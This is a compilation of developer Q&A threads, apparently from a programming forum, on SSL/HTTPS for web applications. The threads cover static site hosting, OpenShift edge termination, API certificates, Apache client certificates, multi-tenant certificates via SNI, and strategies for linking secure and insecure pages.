SSL for statically served web application - ssl

I'm building a serverless web application. My HTML, CSS and JavaScript are in a public storage location which my domain example.com points towards.
When my users navigate to my domain using their browser, their browser will GET these files from that location and then there is no further communication with example.com. The JavaScript application runs in the browser and communicates with a separate backend via HTTPS (in my case AWS, but could be e.g. Azure, Kinvey, BlueMix or others).
It therefore seems to be that there is no reason to encrypt the communication between my users' web browsers and xyz.com i.e. I don't need to provide https://example.com, and my doing so would provide no security benefit.
Am I correct?
The reason I ask is that I found at least two static hosting services which offer SSL support:
https://www.netlify.com/features#security
https://surge.sh/help/using-https-by-default
I am aware of the reasons for wanting HTTPS (described in the second link above and also at https://levels.io/default-to-https/ ...) but none of this seems to apply to my situation.
I believe this is a serious question because more applications will be built in this manner (the folks at http://serverlessconf.io/ certainly think so), and as long as the channel to the actual backend is secured there is no reason to secure the channel to what is essentially a read-only hard disk.

If you don't secure communication with example.com then a man in the middle attacker (eg a rogue wifi hotspot) could modify the html and JavaScript loaded by users.
One way to use this would be to change the JavaScript so that subsequent API requests are sent to attacker controller servers instead of yours, compromising any credentials or information transferred.

Related

openshift ssl edge termination risk

I have been reading the Openshift documentation for secured (SSL) routes.
Since I use a free plan, I can only have an "Edge Termination" route, meaning the SSL is ended when external requests reach the router, with contents being transmitted from the router to the internal service via HTTP.
Is this secure ? I mean, part of the information transmission is done via HTTP in the end.
The connection between where the secure connection is terminated and your application which accepts the proxied plain HTTP request is all internal to the OpenShift cluster. It doesn't travel through any public network in the clear. Further, the way the software defined networking in OpenShift works, it is not possible for any other normal user to see that traffic, nor can applications running in other projects see the traffic.
The only people who might be able to see the traffic are administrators of the OpenShift cluster, but the same people could access your application container also. Any administrators of the system could access your application container even if using a pass through secure connection terminated with your application. So is the same situation as most managed hosting, where you rely on the administrators of the service to do the right thing.

Structuring an application with it's API

I am currently developing a web application to allow customers to place orders.
The way I have choosed to handle the application structure is to split the app in two sub-applications:
1 backend application (the API) that serves only json content
1 front end application (AngularJS in my case) that takes an API url as configuration and serves user content
Now on the server, what I have done for testing, is creating 2 virtual hosts:
app.com
api.app.com
and linked the API to the frontend app.
The problem is that everything will be served over https and, in the current setup, I will need to buy either 2 SSL certificates, or 1 wildcard certificate.
The second solution would be to create a subdirectory on the frontend app (let's say /api) and copy the backend app into it. The advantage would be to get only one single SSL certificate and have everything on the same directory; the /api would be an .htaccess redirect to the backend api.
I think that the "cleanest" solution would be to split the two apps completely and get a wildcard SSL certificate for both, but I'd like to hear if someone have some experience whether one solution is better than another.
The advantage of combining is that you will get to avoid CORS. CORS isn't that bad, but it's another complication. That being said, if you want to expose this to the outside world (allow other web pages to use it), you might want to go through that process anyway.
If you aren't looking to actually expose your API to third-parties, but just keep your layers separate, than I would either look at combining, or even proxying. I've used this architecture to put my services completely behind the firewall, and use mod_proxy or the like to serve my API through my web server. This is useful as it limits the exposure of your API, and solves CORS issues in one go.
If you really want to use SSL between your web server and your API server, you can do a self-generated client certificate between you web-server and your API server.

How to implement a SSL Client Certificate on an Apache Server for a REST api?

Background:
Imagine a website, visible to the world, https://www.example.com, with a static IP address, 1.1.1.1. This site is hosted in an Apache server and it already possess an SSL Server Certificate.
On the other hand, inside a protected internal network, not visible to the world, a server (https://www.myinternalserver.com), with a static IP address (2.2.2.2), also running Apache, runs some internal web-based applications.
A static IP address (3.3.3.3), that maps to a subdomain (myapps) of the external site (https://myapps.example.com) serves as an entry point to the server where the internal web-based applications reside.
A firewall that protects the internal network does the redirect/proxying so all external traffic going to 3.3.3.3 is redirected internally to 2.2.2.2.
The firewall also limits all external traffic so any calls going to 3.3.3.3 must have been originated at 1.1.1.1, in essence, making the external website (https://www.example.com) the only authorized caller to the internal server (https://www.myinternalserver.com).
Scenario
With this infrastructure in place, I can make REST calls from the external website into the internal network and send back data to use in the pages. So, in this scenario, the external site is the client and the internal application, the server.
Question:
But beyond that, I want the server in the internal network to issue an "SSL Client Certificate" that would be "installed" (I don't know if this is the correct term), in the external website so all calls from the external site would have to be authenticated against this certificate.
How do I accomplish this?
Breaking the question:
I know that the question above is very broad, so let me try to break it into three (not so) "smaller" questions:
1 - How to I create the key/certificate? Using OPENSSL and some online recipes (this is one of them: http://www.impetus.us/~rjmooney/projects/misc/clientcertauth.html), I was able to generate the certificate file and learned (or so I believe) what I have to do with it and what to change in the httpd.conf file. In any case, I would like to feel more secure about what I have done so any suggestions/guidance here would be highly appreciated. For example, is the recipe I used any good?
2 - How to "install/transfer" this certificate to the external site? Do I simply copy/send one of the files created when generating the certificate? If so, which one? Where specifically does it go in the client server (external site)? Do they have to do anything at their end? If not, what is the process? I tried to contact the hosting company but I don't know if Icouldn't explain it to them or if they don't have experience with "SSL Client Certificate". All they told me is that there's already an SSL Certificate installed (SSL Server Certificate). They don't even seem to know what a "SSL Client Certificate" is.
3 - Once the certificate in place, what can I do to guarantee that ALL calls to the internal server, by default, come with the Certificate, without the need to code it into each API I create? I know very little about certificates so it might be possible that it happens "by default" always, but I read online about certificates that are "embedded" in the header of the API call, so I just want to be sure.
Thank you.
After some more research, this is what I found...
1 - How do I create the key/certificate?
I had to try other recipes and use a combination of them to get what I wanted. What I learned is that I have to create a certificate (CA Certificate) first, and generate the Server and Client certificates based on that first one. So look for recipes that encompass all three certificates: CA, Server, Client.
2 - How to install/transfer this certificate to the external site?
Actually you simply copy the necessary ones (client/CA) to a safe place in your share of the external site. A place outside the "www" tree.
3 - Once the certificate in place, what can I do to guarantee that ALL calls...
Well, here is what I did.
I "objectified my API call using php/libcURL and place it too, outside the "www" tree. For any developer in my site to use it, all they have to do is create an instance of the object and make the call by passing the URL as a parameter. In other words, you don't install the certificate. Instead, you make a call to the certificates each time you make a call to the internal server.
I hope it helps someone out there.

Managing SSL certs for a multi-tenant website

We have a multi-tenant website where we use a wildcard SSL cert to give people a subdomain to our site. Some of our customers would like to use their own domain, but I'm concerned about how we would manage each customer's certificate as our business grows. Currently the certificate resides on the web server, which means loading all of the certs to each web server as we add them.
I'm aware we could introduce a dedicated SSL device in front of the web servers, but are there other options to improve the management of these certificates?
I'm a Microsoft Technical Evangelist and one of my partners had exactly the same challenge.
I have created a sample source code that automates and manages SSL certificates for multiple domain bindings using a new IIS 8 (Windows Server 2012) feature called SNI, which is a kind of SSL hostheaders.
All you will need to do is to reuse my code (it's quite simple) and upload your custom SSL certificates to the blob storage, or you can write your own provider to fetch custom domains and certificates from your database.
I have posted a detailed explanation and a sample "plug & play" source-code at:
http://www.vic.ms/microsoft/windows-azure/multiples-ssl-certificates-on-windows-azure-cloud-services/
You could make your clients deal with their own certificates and make them run there own https site. They can serve a page containing a single frame with your content (over https). The users will see their domain and their certificate and the browser will load the frame without complaining as long as the frame contents are also loaded over a valid https connection. I created a quick an dirty test page so you can see it in action.
This solution will 'break' the address bar as it will keep the url of the page containing the frame. Depending on the type of site you're running this might be a showstopper.

SSL Linking Strategy In Applications

I'm interested in hearing what others do when, in a given application, some pages need to be secure and others don't. Take any solution off the table that requires a separate domain/subdomain. In this case, all calls, secure or insecure, will link to the same domain. I see a few options:
The ham-fisted, just secure it all approach.
A URI rewrite solution that ensure the pages that need to be secure are accessed via the https protocol and either ignores other pages or, alternatively, forces those to standard http
An application-centric approach where each link is responsible for knowing whether it's pointing and applying the correct protocol. In this solution, all links would have to be fully qualified.
A laissez-fair version of the application-centric approach where links to secure pages are fully qualified and links to other pages are not. In this case, the protocol would be inherited for pages not handled explicitly and inconsequential pages may be accessed via https.
I've used several of these from time to time, but they all have drawbacks. What's everyone else doing in these situations? Is there another path I haven't considered?
UPDATE:
vartec's answer below made me realize that I'd left out one critical piece of information. In my network config, all SSL-handling is taken care of at the load balancer level. The LB, then, communicates with the web server cluster via port 80. As a result, the applications themselves have no idea whether traffic arrived securely. All they see is a port 80 connection.
Thanks.
I use a mixture of #4 and #2: try to specify absolute URLs where possible when I need to switch protocols, and implement server-side redirection to catch any links I haven't used absolute URLs on (or if someone accesses the URL directly, not by following a link).
In my view, the one essential thing is that the pages which need to be accessed securely (form submissions etc.) are accessed securely, and for that I use Apache's SSLRequireSSL directive. It makes it easy to verify to myself that certain pages will never be accessed except over SSL.
I'm for the ham-fisted secure it all approach, but then you took my real solution off the table by (strangely to my mind) excluding domain/subdomain solutions. Errors in securing the site are far more dangerous than a bit of processing overhead.
We have our main site, which is insecure (but mainly marketing) and then we have the application site which is a different subdomain. Simple, easy and effective. Why take that option off the table?
Application centric approach, where controller for each page knows if it has to be secure. If it needs to be secure, but it's accessed via insecure http, redirect to https, passing along all of parameters.